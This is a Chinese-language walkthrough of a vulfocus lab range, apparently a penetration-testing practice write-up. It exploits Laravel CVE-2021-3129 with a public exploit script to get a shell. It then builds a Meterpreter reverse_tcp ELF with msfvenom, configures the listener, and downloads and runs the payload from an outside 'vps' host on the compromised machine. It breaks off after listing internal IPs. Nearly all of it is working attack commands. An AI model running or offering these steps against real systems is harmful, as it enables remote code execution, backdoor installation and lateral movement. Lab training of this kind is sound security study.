vulfocus 内网死角
靶场很多flag没有了,不要太过在意
内网死角 内网资产分布
直接打开一个 Laravel框架 (Laravel v8.41.0 (PHP v7.4.19)),查询历史漏洞 存在 CVE-2021-3129 远程代码执行
1. laravel-CVE-2021-3129-EXP
github项目地址:https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
一键 getshell (注意url后面不要 /)
python3 laravel-CVE-2021-3129-EXP.py http://127.0.0.1:8000
哥斯拉连接 需要使用3.0一下版本
2. MSF上线 内网渗透
msf生成linux后门
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxxx -f elf -o xxxx.elf
配置msf linux/x86/meterpreter/reverse_tcp payload监听
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST xxx
set LPORT xxx
exploit
在受控机器中执行 下载木马程序命令 并执行上线
curl -LO http://vps/xx.elf
chomd +x xx.elf
./xx.elf
查看网络发现多个网卡和IP
192.120.2.83
<